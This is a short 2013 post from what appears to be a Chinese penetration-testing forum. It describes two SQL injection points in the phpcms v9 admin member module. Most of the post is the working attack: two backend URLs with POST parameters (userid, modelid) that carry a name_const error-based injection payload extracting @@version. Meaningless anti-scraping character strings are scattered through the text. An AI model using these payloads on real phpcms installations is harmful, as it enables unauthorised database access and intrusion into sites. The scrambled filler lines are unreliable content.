中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]

作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):! ^/ z6 d" M. M

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

* a* t& M1 R" w8 d
( _% b: L* R& H% B, b- x& G

: {, \7 Q) p3 R! x4 _9 r' c. [

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2